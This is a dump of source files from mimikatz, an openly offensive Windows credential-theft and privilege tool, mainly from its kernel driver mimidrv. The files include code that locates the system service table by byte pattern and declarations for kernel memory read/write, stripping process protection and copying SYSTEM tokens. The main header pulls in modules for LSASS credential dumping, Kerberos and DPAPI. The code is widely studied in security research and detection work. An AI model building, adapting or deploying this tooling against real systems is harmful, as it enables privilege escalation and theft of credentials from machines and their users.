40 | KiwiOsIndex_10_1703 = 10,
41 | KiwiOsIndex_10_1709 = 11,
42 | KiwiOsIndex_10_1803 = 12,
43 | KiwiOsIndex_10_1809 = 13,
44 | KiwiOsIndex_10_1903 = 14,
45 | KiwiOsIndex_10_1909 = 15,
46 | KiwiOsIndex_10_2004 = 16,
47 | KiwiOsIndex_MAX = 17,
48 | } KIWI_OS_INDEX, *PKIWI_OS_INDEX;
49 |
50 | #if defined(_M_X64) || defined(_M_ARM64) // TODO:ARM64
51 | #define EX_FAST_REF_MASK 0x0f
52 | #elif defined(_M_IX86)
53 | #define EX_FAST_REF_MASK 0x07
54 | #endif
55 |
56 | #define KIWI_mask3bits(addr) (((ULONG_PTR) (addr)) & ~7)
57 |
58 | KIWI_OS_INDEX KiwiOsIndex;
--------------------------------------------------------------------------------
/mimidrv/kkll_m_filters.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "globals.h"
8 | #include "kkll_m_modules.h"
9 |
10 | typedef enum _KIWI_MF_INDEX {
11 | CallbackOffset = 0,
12 | CallbackPreOffset = 1,
13 | CallbackPostOffset = 2,
14 | CallbackVolumeNameOffset = 3,
15 |
16 | MF_MAX = 4,
17 | } KIWI_MF_INDEX, *PKIWI_MF_INDEX;
18 |
19 | NTSTATUS kkll_m_filters_list(PKIWI_BUFFER outBuffer);
20 | NTSTATUS kkll_m_minifilters_list(PKIWI_BUFFER outBuffer);
--------------------------------------------------------------------------------
/mimidrv/kkll_m_memory.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "globals.h"
8 |
9 | typedef struct _KKLL_M_MEMORY_PATTERN {
10 | DWORD Length;
11 | PUCHAR Pattern;
12 | } KKLL_M_MEMORY_PATTERN, *PKKLL_M_MEMORY_PATTERN;
13 |
14 | typedef struct _KKLL_M_MEMORY_OFFSETS {
15 | LONG off0;
16 | LONG off1;
17 | LONG off2;
18 | LONG off3;
19 | LONG off4;
20 | LONG off5;
21 | LONG off6;
22 | LONG off7;
23 | LONG off8;
24 | LONG off9;
25 | } KKLL_M_MEMORY_OFFSETS, *PKKLL_M_MEMORY_OFFSETS;
26 |
27 | typedef struct _KKLL_M_MEMORY_GENERIC {
28 | KIWI_OS_INDEX OsIndex;
29 | KKLL_M_MEMORY_PATTERN Search;
30 | PWCHAR start;
31 | PWCHAR end;
32 | KKLL_M_MEMORY_OFFSETS Offsets;
33 | } KKLL_M_MEMORY_GENERIC, *PKKLL_M_MEMORY_GENERIC;
34 |
35 | NTSTATUS kkll_m_memory_search(const PUCHAR adresseBase, const PUCHAR adresseMaxMin, const UCHAR *pattern, PUCHAR *addressePattern, SIZE_T longueur);
36 | NTSTATUS kkll_m_memory_genericPointerSearch(PUCHAR *addressePointeur, const PUCHAR adresseBase, const PUCHAR adresseMaxMin, const UCHAR *pattern, SIZE_T longueur, LONG offsetTo);
37 |
38 | PKKLL_M_MEMORY_GENERIC kkll_m_memory_getGenericFromBuild(PKKLL_M_MEMORY_GENERIC generics, SIZE_T cbGenerics);
39 | NTSTATUS kkll_m_memory_vm_read(PVOID Dest, PVOID From, DWORD Size);
40 | NTSTATUS kkll_m_memory_vm_write(PVOID Dest, PVOID From, DWORD Size);
41 | NTSTATUS kkll_m_memory_vm_alloc(DWORD Size, PVOID *Addr);
42 | NTSTATUS kkll_m_memory_vm_free(PVOID Addr);
--------------------------------------------------------------------------------
/mimidrv/kkll_m_modules.c:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #include "kkll_m_modules.h"
7 |
8 | NTSTATUS kkll_m_modules_enum(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER outBuffer, PKKLL_M_MODULE_CALLBACK callback, PVOID pvArg)
9 | {
10 | NTSTATUS status = STATUS_SUCCESS;
11 | ULONG i, modulesSize, numberOfModules;
12 | PAUX_MODULE_EXTENDED_INFO pModules;
13 | BOOLEAN mustContinue = TRUE;
14 |
15 | status = AuxKlibQueryModuleInformation(&modulesSize, sizeof(AUX_MODULE_EXTENDED_INFO), NULL);
16 | if(NT_SUCCESS(status) && modulesSize)
17 | {
18 | if(pModules = (PAUX_MODULE_EXTENDED_INFO) ExAllocatePoolWithTag(PagedPool, modulesSize, POOL_TAG))
19 | {
20 | numberOfModules = modulesSize / sizeof(AUX_MODULE_EXTENDED_INFO);
21 | status = AuxKlibQueryModuleInformation(&modulesSize, sizeof(AUX_MODULE_EXTENDED_INFO), pModules);
22 | for(i = 0; NT_SUCCESS(status) && mustContinue && (i < numberOfModules); i++)
23 | status = callback(szBufferIn, bufferIn, outBuffer, pModules + i, pvArg, &mustContinue);
24 | ExFreePoolWithTag(pModules, POOL_TAG);
25 | }
26 | }
27 | return status;
28 | }
29 |
30 | NTSTATUS kkll_m_modules_list_callback(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER outBuffer, PAUX_MODULE_EXTENDED_INFO pModule, PVOID pvArg, BOOLEAN * mustContinue)
31 | {
32 | return kprintf(outBuffer, L"0x%p - %u\t%S\n", pModule->BasicInfo.ImageBase, pModule->ImageSize, pModule->FullPathName + pModule->FileNameOffset);
33 | }
34 |
35 | NTSTATUS kkll_m_modules_fromAddr(PKIWI_BUFFER outBuffer, PVOID addr)
36 | {
37 | KKLL_M_MODULE_FROM_ADDR structAddr = {FALSE, (ULONG_PTR) addr};
38 | NTSTATUS status = kkll_m_modules_enum(0, NULL, outBuffer, kkll_m_modules_fromAddr_callback, &structAddr);
39 |
40 | if(NT_SUCCESS(status) && !structAddr.isFound)
41 | status = kprintf(outBuffer, L"0x%p [ ? ]\n", addr);
42 |
43 | return status;
44 | }
45 |
46 | NTSTATUS kkll_m_modules_fromAddr_callback(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER outBuffer, PAUX_MODULE_EXTENDED_INFO pModule, PVOID pvArg, BOOLEAN * mustContinue)
47 | {
48 | NTSTATUS status = STATUS_SUCCESS;
49 | PKKLL_M_MODULE_FROM_ADDR pStructAddr = (PKKLL_M_MODULE_FROM_ADDR) pvArg;
50 |
51 | if((pStructAddr->addr >= (ULONG_PTR) pModule->BasicInfo.ImageBase) && (pStructAddr->addr < ((ULONG_PTR) pModule->BasicInfo.ImageBase + pModule->ImageSize)))
52 | {
53 | *mustContinue = FALSE;
54 | pStructAddr->isFound = TRUE;
55 | status = kprintf(outBuffer, L"0x%p [%S + 0x%x]\n", (PVOID) pStructAddr->addr, pModule->FullPathName + pModule->FileNameOffset, pStructAddr->addr - (ULONG_PTR) pModule->BasicInfo.ImageBase);
56 | }
57 | return status;
58 | }
59 |
60 | NTSTATUS kkll_m_modules_first_callback(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER outBuffer, PAUX_MODULE_EXTENDED_INFO pModule, PVOID pvArg, BOOLEAN * mustContinue)
61 | {
62 | *mustContinue = FALSE;
63 | ((PKKLL_M_MODULE_BASIC_INFOS) pvArg)->addr = (PUCHAR) pModule->BasicInfo.ImageBase;
64 | ((PKKLL_M_MODULE_BASIC_INFOS) pvArg)->size = pModule->ImageSize;
65 | return STATUS_SUCCESS;
66 | }
--------------------------------------------------------------------------------
/mimidrv/kkll_m_modules.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "globals.h"
8 |
9 | typedef NTSTATUS (* PKKLL_M_MODULE_CALLBACK) (SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER outBuffer, PAUX_MODULE_EXTENDED_INFO pModule, PVOID pvArg, BOOLEAN * mustContinue);
10 |
11 | typedef struct _KKLL_M_MODULE_FROM_ADDR {
12 | BOOLEAN isFound;
13 | ULONG_PTR addr;
14 | } KKLL_M_MODULE_FROM_ADDR, *PKKLL_M_MODULE_FROM_ADDR;
15 |
16 | typedef struct _KKLL_M_MODULE_BASIC_INFOS {
17 | PUCHAR addr;
18 | SIZE_T size;
19 | } KKLL_M_MODULE_BASIC_INFOS, *PKKLL_M_MODULE_BASIC_INFOS;
20 |
21 | NTSTATUS kkll_m_modules_enum(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER outBuffer, PKKLL_M_MODULE_CALLBACK callback, PVOID pvArg);
22 |
23 | NTSTATUS kkll_m_modules_list_callback(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER outBuffer, PAUX_MODULE_EXTENDED_INFO pModule, PVOID pvArg, BOOLEAN * mustContinue);
24 |
25 | NTSTATUS kkll_m_modules_fromAddr(PKIWI_BUFFER outBuffer, PVOID addr);
26 | NTSTATUS kkll_m_modules_fromAddr_callback(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER outBuffer, PAUX_MODULE_EXTENDED_INFO pModule, PVOID pvArg, BOOLEAN * mustContinue);
27 |
28 | NTSTATUS kkll_m_modules_first_callback(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER outBuffer, PAUX_MODULE_EXTENDED_INFO pModule, PVOID pvArg, BOOLEAN * mustContinue);
--------------------------------------------------------------------------------
/mimidrv/kkll_m_notify.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "globals.h"
8 | #include "kkll_m_memory.h"
9 | #include "kkll_m_modules.h"
10 |
11 | #define OBJECT_HASH_TABLE_SIZE 37
12 | #define CM_REG_MAX_CALLBACKS 100
13 |
14 | typedef struct _KKLL_M_NOTIFY_CALLBACK {
15 | #if defined(_M_IX86)
16 | ULONG unk0;
17 | #endif
18 | PVOID * callback;
19 | } KKLL_M_NOTIFY_CALLBACK, *PKKLL_M_NOTIFY_CALLBACK;
20 |
21 | typedef struct _OBJECT_DIRECTORY_ENTRY {
22 | struct _OBJECT_DIRECTORY_ENTRY * ChainLink;
23 | PVOID Object;
24 | } OBJECT_DIRECTORY_ENTRY, *POBJECT_DIRECTORY_ENTRY;
25 |
26 | typedef struct _OBJECT_DIRECTORY {
27 | POBJECT_DIRECTORY_ENTRY HashBuckets[OBJECT_HASH_TABLE_SIZE];
28 | /* ... */
29 | } OBJECT_DIRECTORY, *POBJECT_DIRECTORY;
30 |
31 | typedef struct _OBJECT_CALLBACK_ENTRY {
32 | LIST_ENTRY CallbackList;
33 | OB_OPERATION Operations;
34 | ULONG Active;
35 | /*OB_HANDLE*/ PVOID Handle;
36 | POBJECT_TYPE ObjectType;
37 | POB_PRE_OPERATION_CALLBACK PreOperation;
38 | POB_POST_OPERATION_CALLBACK PostOperation;
39 | /* ... */
40 | } OBJECT_CALLBACK_ENTRY, *POBJECT_CALLBACK_ENTRY;
41 |
42 | typedef NTSTATUS (* PPSSETCREATEPROCESSNOTIFYROUTINEEX) ( __in PCREATE_PROCESS_NOTIFY_ROUTINE_EX NotifyRoutine, __in BOOLEAN Remove);
43 | //typedef VOID (* POBUNREGISTERCALLBACKS) (__in PVOID RegistrationHandle);
44 |
45 | NTSTATUS kkll_m_notify_list_thread(PKIWI_BUFFER outBuffer);
46 | NTSTATUS kkll_m_notify_list_process(PKIWI_BUFFER outBuffer);
47 | NTSTATUS kkll_m_notify_list_image(PKIWI_BUFFER outBuffer);
48 | NTSTATUS kkll_m_notify_list_reg(PKIWI_BUFFER outBuffer);
49 | NTSTATUS kkll_m_notify_list_object(PKIWI_BUFFER outBuffer);
50 | NTSTATUS kkll_m_notify_desc_object_callback(POBJECT_CALLBACK_ENTRY pCallbackEntry, PKIWI_BUFFER outBuffer);
51 |
52 | NTSTATUS kkll_m_notify_list(PKIWI_BUFFER outBuffer, PKKLL_M_MEMORY_GENERIC generics, SIZE_T cbGenerics, PUCHAR * ptr, PULONG pRoutineMax);
53 | NTSTATUS kkll_m_notify_search(PKKLL_M_MEMORY_GENERIC generics, SIZE_T cbGenerics, PUCHAR * ptr, PULONG pRoutineMax, PKKLL_M_MEMORY_OFFSETS * pOffsets);
--------------------------------------------------------------------------------
/mimidrv/kkll_m_process.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "globals.h"
8 |
9 | typedef enum _KIWI_PROCESS_INDEX {
10 | EprocessNext = 0,
11 | EprocessFlags2 = 1,
12 | TokenPrivs = 2,
13 | SignatureProtect= 3,
14 |
15 | Eprocess_MAX = 4,
16 | } KIWI_PROCESS_INDEX, *PKIWI_PROCESS_INDEX;
17 |
18 | typedef struct _KIWI_NT6_PRIVILEGES {
19 | UCHAR Present[8];
20 | UCHAR Enabled[8];
21 | UCHAR EnabledByDefault[8];
22 | } KIWI_NT6_PRIVILEGES, *PKIWI_NT6_PRIVILEGES;
23 |
24 | #define TOKEN_FROZEN_MASK 0x00008000
25 | #define PROTECTED_PROCESS_MASK 0x00000800
26 |
27 | typedef NTSTATUS (* PKKLL_M_PROCESS_CALLBACK) (SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER outBuffer, PEPROCESS pProcess, PVOID pvArg);
28 | NTSTATUS kkll_m_process_enum(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER outBuffer, PKKLL_M_PROCESS_CALLBACK callback, PVOID pvArg);
29 |
30 | NTSTATUS kkll_m_process_token(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER outBuffer);
31 | NTSTATUS kkll_m_process_protect(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER outBuffer);
32 | NTSTATUS kkll_m_process_fullprivileges(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER outBuffer);
33 |
34 | NTSTATUS kkll_m_process_token_toProcess(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER outBuffer, HANDLE hSrcToken, PEPROCESS pToProcess);
35 |
36 | NTSTATUS kkll_m_process_list_callback(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER outBuffer, PEPROCESS pProcess, PVOID pvArg);
37 | NTSTATUS kkll_m_process_systoken_callback(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER outBuffer, PEPROCESS pProcess, PVOID pvArg);
--------------------------------------------------------------------------------
/mimidrv/kkll_m_ssdt.c:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #include "kkll_m_ssdt.h"
7 |
8 | #if defined(_M_X64)
9 | PSERVICE_DESCRIPTOR_TABLE KeServiceDescriptorTable = NULL;
10 | #endif
11 |
12 | NTSTATUS kkll_m_ssdt_list(PKIWI_BUFFER outBuffer)
13 | {
14 | NTSTATUS status;
15 | USHORT idxFunction;
16 | ULONG_PTR funcAddr;
17 |
18 | #if defined(_M_X64)
19 | status = kkll_m_ssdt_getKeServiceDescriptorTable();
20 | if(NT_SUCCESS(status))
21 | {
22 | #endif
23 | status = kprintf(outBuffer, L"KeServiceDescriptorTable : 0x%p (%u)\n", KeServiceDescriptorTable, KeServiceDescriptorTable->TableSize);
24 | for(idxFunction = 0; (idxFunction < KeServiceDescriptorTable->TableSize) && NT_SUCCESS(status) ; idxFunction++)
25 | {
26 | #if defined(_M_IX86)
27 | funcAddr = (ULONG_PTR) KeServiceDescriptorTable->ServiceTable[idxFunction];
28 | #else
29 | funcAddr = (ULONG_PTR) KeServiceDescriptorTable->OffsetToService;
30 | if(KiwiOsIndex < KiwiOsIndex_VISTA)
31 | funcAddr += KeServiceDescriptorTable->OffsetToService[idxFunction] & ~EX_FAST_REF_MASK;
32 | else
33 | funcAddr += KeServiceDescriptorTable->OffsetToService[idxFunction] >> 4;
34 | #endif
35 | status = kprintf(outBuffer, L"[%5u] ", idxFunction);
36 | if(NT_SUCCESS(status))
37 | status = kkll_m_modules_fromAddr(outBuffer, (PVOID) funcAddr);
38 | }
39 | #if defined(_M_X64)
40 | }
41 | #endif
42 | return status;
43 | }
44 |
45 | #if defined(_M_X64)
46 | const UCHAR PTRN_WALL_Ke[] = {/*0x00, 0x00, 0x4d, 0x0f, 0x45,*/ 0xd3, 0x42, 0x3b, 0x44, 0x17, 0x10, 0x0f, 0x83};
47 | const UCHAR PTRN_W1803_Ke[] = {0xd3, 0x41, 0x3b, 0x44, 0x3a, 0x10, 0x0f, 0x83};
48 | const LONG OFFS_WNO8_Ke = -24;//-19;
49 | const LONG OFFS_WIN8_Ke = -21;//-16;
50 | const LONG OFFS_WIN10A_Ke = -38;//-16;
51 | NTSTATUS kkll_m_ssdt_getKeServiceDescriptorTable()
52 | {
53 | NTSTATUS status = STATUS_NOT_FOUND;
54 | if(KeServiceDescriptorTable)
55 | status = STATUS_SUCCESS;
56 | else
57 | {
58 | status = kkll_m_memory_genericPointerSearch(
59 | (PUCHAR *) &KeServiceDescriptorTable,
60 | ((PUCHAR) ZwUnloadKey) - (21 * PAGE_SIZE),
61 | ((PUCHAR) ZwUnloadKey) + (19 * PAGE_SIZE),
62 | (KiwiOsIndex < KiwiOsIndex_10_1803) ? PTRN_WALL_Ke : PTRN_W1803_Ke,
63 | (KiwiOsIndex < KiwiOsIndex_10_1803) ? sizeof(PTRN_WALL_Ke) : sizeof(PTRN_W1803_Ke),
64 | (KiwiOsIndex < KiwiOsIndex_8) ? OFFS_WNO8_Ke : (KiwiOsIndex < KiwiOsIndex_10_1607) ? OFFS_WIN8_Ke : OFFS_WIN10A_Ke);
65 | }
66 | return status;
67 | }
68 | #endif
--------------------------------------------------------------------------------
/mimidrv/kkll_m_ssdt.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "globals.h"
8 | #include "kkll_m_modules.h"
9 | #include "kkll_m_memory.h"
10 |
11 | typedef struct _SERVICE_DESCRIPTOR_TABLE {
12 | #if defined(_M_IX86)
13 | PVOID *ServiceTable;
14 | #elif defined(_M_X64)
15 | LONG *OffsetToService;
16 | #endif
17 | PULONG CounterTable;
18 | ULONG TableSize;
19 | PUCHAR ArgumentTable;
20 | } SERVICE_DESCRIPTOR_TABLE, *PSERVICE_DESCRIPTOR_TABLE;
21 |
22 | #if defined(_M_IX86)
23 | extern PSERVICE_DESCRIPTOR_TABLE KeServiceDescriptorTable;
24 | #elif defined(_M_X64)
25 | PSERVICE_DESCRIPTOR_TABLE KeServiceDescriptorTable;
26 | NTSTATUS kkll_m_ssdt_getKeServiceDescriptorTable();
27 | #endif
28 |
29 | NTSTATUS kkll_m_ssdt_list(PKIWI_BUFFER outBuffer);
--------------------------------------------------------------------------------
/mimidrv/mimidrv.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 | #include "globals.h"
8 | #include "kkll_m_process.h"
9 | #include "kkll_m_modules.h"
10 | #include "kkll_m_ssdt.h"
11 | #include "kkll_m_notify.h"
12 | #include "kkll_m_filters.h"
13 |
14 | extern PSHORT NtBuildNumber;
15 |
16 | DRIVER_INITIALIZE DriverEntry;
17 | DRIVER_UNLOAD DriverUnload;
18 |
19 | DRIVER_DISPATCH UnSupported;
20 | __drv_dispatchType(IRP_MJ_DEVICE_CONTROL) DRIVER_DISPATCH MimiDispatchDeviceControl;
21 |
22 | KIWI_OS_INDEX getWindowsIndex();
--------------------------------------------------------------------------------
/mimidrv/mimidrv.rc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/gentilkiwi/mimikatz/152b208916c27d7d1fc32d10e64879721c4d06af/mimidrv/mimidrv.rc
--------------------------------------------------------------------------------
/mimidrv/mimidrv.vcxproj:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8"?>
2 | <Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3 | <ItemGroup Label="ProjectConfigurations">
4 | <ProjectConfiguration Include="Release|Win32">
5 | <Configuration>Release</Configuration>
6 | <Platform>Win32</Platform>
7 | </ProjectConfiguration>
8 | <ProjectConfiguration Include="Release|x64">
9 | <Configuration>Release</Configuration>
10 | <Platform>x64</Platform>
11 | </ProjectConfiguration>
12 | </ItemGroup>
13 | <PropertyGroup Label="Globals">
14 | <ProjectGuid>{86FF6D04-208C-442F-B27C-E4255DD39402}</ProjectGuid>
15 | <Keyword>MakeFileProj</Keyword>
16 | </PropertyGroup>
17 | <PropertyGroup Label="Configuration">
18 | <ConfigurationType>Makefile</ConfigurationType>
19 | <UseDebugLibraries>false</UseDebugLibraries>
20 | <PlatformToolset>v100</PlatformToolset>
21 | </PropertyGroup>
22 | <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
23 | <PropertyGroup>
24 | <OutDir>$(SolutionDir)$(Platform)\</OutDir>
25 | <IntDir>$(Platform)\</IntDir>
26 | <NMakeBuildCommandLine>_build_.cmd $(Platform) $(SolutionDir)$(Platform)\</NMakeBuildCommandLine>
27 | <NMakeCleanCommandLine>_clean_.cmd $(Platform) $(SolutionDir)$(Platform)\</NMakeCleanCommandLine>
28 | <NMakeReBuildCommandLine>_rebuild_.cmd $(Platform) $(SolutionDir)$(Platform)\</NMakeReBuildCommandLine>
29 | <NMakeIncludeSearchPath>C:\WinDDK\7600.16385.1\inc;C:\WinDDK\7600.16385.1\inc\api;C:\WinDDK\7600.16385.1\inc\ddk</NMakeIncludeSearchPath>
30 | <NMakePreprocessorDefinitions>WIN32;NDEBUG;_X86_</NMakePreprocessorDefinitions>
31 | </PropertyGroup>
32 | <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
33 | <ItemGroup>
34 | <ClInclude Include="globals.h" />
35 | <ClInclude Include="ioctl.h" />
36 | <ClInclude Include="kkll_m_filters.h" />
37 | <ClInclude Include="kkll_m_memory.h" />
38 | <ClInclude Include="kkll_m_modules.h" />
39 | <ClInclude Include="kkll_m_notify.h" />
40 | <ClInclude Include="kkll_m_process.h" />
41 | <ClInclude Include="kkll_m_ssdt.h" />
42 | <ClInclude Include="mimidrv.h" />
43 | </ItemGroup>
44 | <ItemGroup>
45 | <ClCompile Include="kkll_m_filters.c" />
46 | <ClCompile Include="kkll_m_memory.c" />
47 | <ClCompile Include="kkll_m_modules.c" />
48 | <ClCompile Include="kkll_m_notify.c" />
49 | <ClCompile Include="kkll_m_process.c" />
50 | <ClCompile Include="kkll_m_ssdt.c" />
51 | <ClCompile Include="mimidrv.c" />
52 | </ItemGroup>
53 | <ItemGroup>
54 | <None Include="MAKEFILE" />
55 | <None Include="SOURCES" />
56 | <None Include="_build_.cmd" />
57 | <None Include="_clean_.cmd" />
58 | <None Include="_rebuild_.cmd" />
59 | </ItemGroup>
60 | <ItemGroup>
61 | <ResourceCompile Include="mimidrv.rc" />
62 | </ItemGroup>
63 | </Project>
--------------------------------------------------------------------------------
/mimidrv/mimidrv.vcxproj.filters:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8"?>
2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3 | <ItemGroup>
4 | <ClInclude Include="globals.h" />
5 | <ClInclude Include="ioctl.h" />
6 | <ClInclude Include="kkll_m_filters.h" />
7 | <ClInclude Include="kkll_m_memory.h" />
8 | <ClInclude Include="kkll_m_modules.h" />
9 | <ClInclude Include="kkll_m_notify.h" />
10 | <ClInclude Include="kkll_m_process.h" />
11 | <ClInclude Include="kkll_m_ssdt.h" />
12 | <ClInclude Include="mimidrv.h" />
13 | </ItemGroup>
14 | <ItemGroup>
15 | <ClCompile Include="kkll_m_filters.c" />
16 | <ClCompile Include="kkll_m_memory.c" />
17 | <ClCompile Include="kkll_m_modules.c" />
18 | <ClCompile Include="kkll_m_notify.c" />
19 | <ClCompile Include="kkll_m_process.c" />
20 | <ClCompile Include="kkll_m_ssdt.c" />
21 | <ClCompile Include="mimidrv.c" />
22 | </ItemGroup>
23 | <ItemGroup>
24 | <None Include="MAKEFILE">
25 | <Filter>winddk</Filter>
26 | </None>
27 | <None Include="SOURCES">
28 | <Filter>winddk</Filter>
29 | </None>
30 | <None Include="_build_.cmd">
31 | <Filter>winddk</Filter>
32 | </None>
33 | <None Include="_clean_.cmd">
34 | <Filter>winddk</Filter>
35 | </None>
36 | <None Include="_rebuild_.cmd">
37 | <Filter>winddk</Filter>
38 | </None>
39 | </ItemGroup>
40 | <ItemGroup>
41 | <ResourceCompile Include="mimidrv.rc" />
42 | </ItemGroup>
43 | <ItemGroup>
44 | <Filter Include="winddk">
45 | <UniqueIdentifier>{72bed6ab-78d7-441d-9009-8445ec0e72e6}</UniqueIdentifier>
46 | </Filter>
47 | </ItemGroup>
48 | </Project>
--------------------------------------------------------------------------------
/mimikatz/mimikatz.h:
--------------------------------------------------------------------------------
1 | /* Benjamin DELPY `gentilkiwi`
2 | https://blog.gentilkiwi.com
3 | benjamin@gentilkiwi.com
4 | Licence : https://creativecommons.org/licenses/by/4.0/
5 | */
6 | #pragma once
7 |
8 | #include "globals.h"
9 | #include "modules/kuhl_m_standard.h"
10 | #include "modules/kuhl_m_crypto.h"
11 | #include "modules/sekurlsa/kuhl_m_sekurlsa.h"
12 | #include "modules/kerberos/kuhl_m_kerberos.h"
13 | #include "modules/ngc/kuhl_m_ngc.h"
14 | #include "modules/kuhl_m_process.h"
15 | #include "modules/kuhl_m_service.h"
16 | #include "modules/kuhl_m_privilege.h"
17 | #include "modules/kuhl_m_lsadump.h"
18 | #include "modules/kuhl_m_ts.h"
19 | #include "modules/kuhl_m_event.h"
20 | #include "modules/kuhl_m_misc.h"
21 | #include "modules/kuhl_m_token.h"
22 | #include "modules/kuhl_m_vault.h"
23 | #include "modules/kuhl_m_minesweeper.h"
24 | #if defined(NET_MODULE)
25 | #include "modules/kuhl_m_net.h"
26 | #endif
27 | #include "modules/dpapi/kuhl_m_dpapi.h"
28 | #include "modules/kuhl_m_kernel.h"
29 | #include "modules/kuhl_m_busylight.h"
30 | #include "modules/kuhl_m_sysenvvalue.h"
31 | #include "modules/kuhl_m_sid.h"
32 | #include "modules/kuhl_m_iis.h"
33 | #include "modules/kuhl_m_rpc.h"
34 | #include "modules/kuhl_m_sr98.h"
35 | #include "modules/kuhl_m_rdm.h"
36 | #include "modules/kuhl_m_acr.h"
37 |
38 | #include <io.h>
39 | #include <fcntl.h>
40 | #define DELAYIMP_INSECURE_WRITABLE_HOOKS
41 | #include <delayimp.h>
42 |
43 | extern VOID WINAPI RtlGetNtVersionNumbers(LPDWORD pMajor, LPDWORD pMinor, LPDWORD pBuild);
44 |
45 | int wmain(int argc, wchar_t * argv[]);
46 | void mimikatz_begin();
47 | void mimikatz_end(NTSTATUS status);
48 |
49 | BOOL WINAPI HandlerRoutine(DWORD dwCtrlType);
50 |
51 | NTSTATUS mimikatz_initOrClean(BOOL Init);
52 |
53 | NTSTATUS mimikatz_doLocal(wchar_t * input);
54 | NTSTATUS mimikatz_dispatchCommand(wchar_t * input);
55 |
56 | #if defined(_POWERKATZ)
57 | __declspec(dllexport) wchar_t * powershell_reflective_mimikatz(LPCWSTR input);
58 | #elif defined(_WINDLL)
59 | void CALLBACK mimikatz_dll(HWND hwnd, HINSTANCE hinst, LPWSTR lpszCmdLine, int nCmdShow);
60 | #if defined(_M_X64) || defined(_M_ARM64)
61 | #pragma comment(linker, "/export:mainW=mimikatz_dll")
62 | #elif defined(_M_IX86)
63 | #pragma comment(linker, "/export:mainW=_mimikatz_dll@16")
64 | #endif
65 | #endif
--------------------------------------------------------------------------------
/mimikatz/mimikatz.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/gentilkiwi/mimikatz/152b208916c27d7d1fc32d10e64879721c4d06af/mimikatz/mimikatz.ico
--------------------------------------------------------------------------------
/mimikatz/mimikatz.rc:
--------------------------------------------------------------------------------
1 | #include <winres.h>
2 | LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US
3 |
4 | VS_VERSION_INFO VERSIONINFO
5 |
6 | FILEVERSION 2,2,0,0
7 | PRODUCTVERSION 2,2,0,0
8 | FILEFLAGS VS_FF_PRERELEASE|VS_FF_SPECIALBUILD|VS_FF_PRIVATEBUILD
9 | FILEFLAGSMASK VS_FFI_FILEFLAGSMASK
10 | FILEOS VOS_NT
11 | FILETYPE VFT_APP
12 | //FILESUBTYPE 0x0L
13 | BEGIN
14 | BLOCK "StringFileInfo"
15 | BEGIN
16 | BLOCK "040904b0"
17 | BEGIN
18 | VALUE "ProductName", "mimikatz"
19 | VALUE "ProductVersion", "2.2.0.0"
20 | VALUE "CompanyName", "gentilkiwi (Benjamin DELPY)"
21 | VALUE "FileDescription", "mimikatz for Windows"
22 | VALUE "FileVersion", "2.2.0.0"
